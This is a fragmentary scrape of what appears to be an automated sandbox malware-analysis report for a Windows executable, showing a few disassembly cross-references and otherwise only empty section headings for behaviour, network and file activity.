Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A57E
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A58E
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(0041B6B5,?,0042A961,?), ref: 0042A5A4

Strings

KERNEL32.DLL, xrefs: 0042A8E4

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Classification

Analysis Advice

Signature Overview

Spam, unwanted Advertisements and Ransom Demands:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe PID: 2732 Parent PID: 2388

General

File Activities

File Opened

File Created

File Written

File Read

Directory Queried

Other File Operations

Volume Information Queried

Device IO

Section Activities

Section loaded by Windows

Section loaded by Program

Registry Activities